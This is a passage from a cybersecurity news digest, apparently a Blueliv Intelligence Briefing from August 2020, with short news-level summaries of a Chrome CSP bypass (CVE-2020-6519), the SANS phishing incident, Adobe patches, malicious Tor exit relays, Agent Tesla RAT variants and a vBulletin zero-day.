Tracked as CVE-2020-6519 (rated 6.5 on the CVSS scale), the issue stems from a CSP bypass that results in arbitrary execution of malicious code on target websites. Some of the most popular websites, including Facebook, Wells Fargo, Zoom, Gmail, WhatsApp, Investopedia, ESPN, Roblox, Indeed, TikTok, Instagram, Blogger, and Quora, were susceptible to the CSP bypass. Interestingly, it appears that the same flaw was also highlighted by Tencent Security Xuanwu Lab more than a year ago, just a month after the release of Chrome 73 in March 2019, but was never addressed until PerimeterX reported the issue earlier this March. Learn more >

Information security training organization falls victim to phishing attack

"We have identified a single phishing e-mail as the vector of the attack. As a result of the e-mail, a single employee's email account was impacted. Aside from the affected user, we currently believe that no other accounts or systems at SANS were compromised," states the SANS data incident notification. The threat actor then proceeded to configure a rule that forwarded all email received in this account to an "unknown external email address" and installed a malicious Office 365 add-on. Learn more >

Adobe Acrobat and Reader affected by critical flaws

The patches have been created for Acrobat DC, Acrobat Reader DC, Acrobat and Classic 2020, Acrobat Reader 2020, Acrobat/Reader 2017, and Acrobat/Reader 2015 on Windows and macOS machines. The important vulnerabilities range from sensitive data exposure, security bypass, stack exhaustion, and out-of-bounds read problems. Learn more >

Blueliv Intelligence Briefing

Tuesday, August 11th, 2020

Threat actors hijack Tor exit nodes to perform SSL stripping attacks

According to a report published on Sunday, the group managed 380 malicious Tor exit relays at its peak, before the Tor team made the first of three interventions to cull this network. The primary goal of these SSL stripping attacks was to allow the group to replace Bitcoin addresses inside HTTP traffic going to Bitcoin mixing services. Learn more >

Agent Tesla | Old RAT Uses New Tricks to Stay on Top

The new variants of Agent Tesla RAT now come with modules dedicated to stealing credentials from applications including popular web browsers, VPN software, as well as FTP and email clients. This malware is currently very popular with business email compromise (BEC) scammers who use it to infect their victims for recording keystrokes and taking screenshots of compromised machines. Learn more >

New zero-day RCE vBulletin bug patched

The zero-day is a bypass for a patch from a previous vBulletin zero-day — namely CVE-2019-16759, disclosed in September 2019. The previous zero-day allowed attackers to exploit a bug in the vBulletin template system to run malicious code and take over forums without needing to authenticate on the victim sites (a type of bug called a pre-auth RCE). However, a researcher said he found a simple way to bypass the patch and continue to exploit the same CVE-2019-16759 vulnerability. Learn more >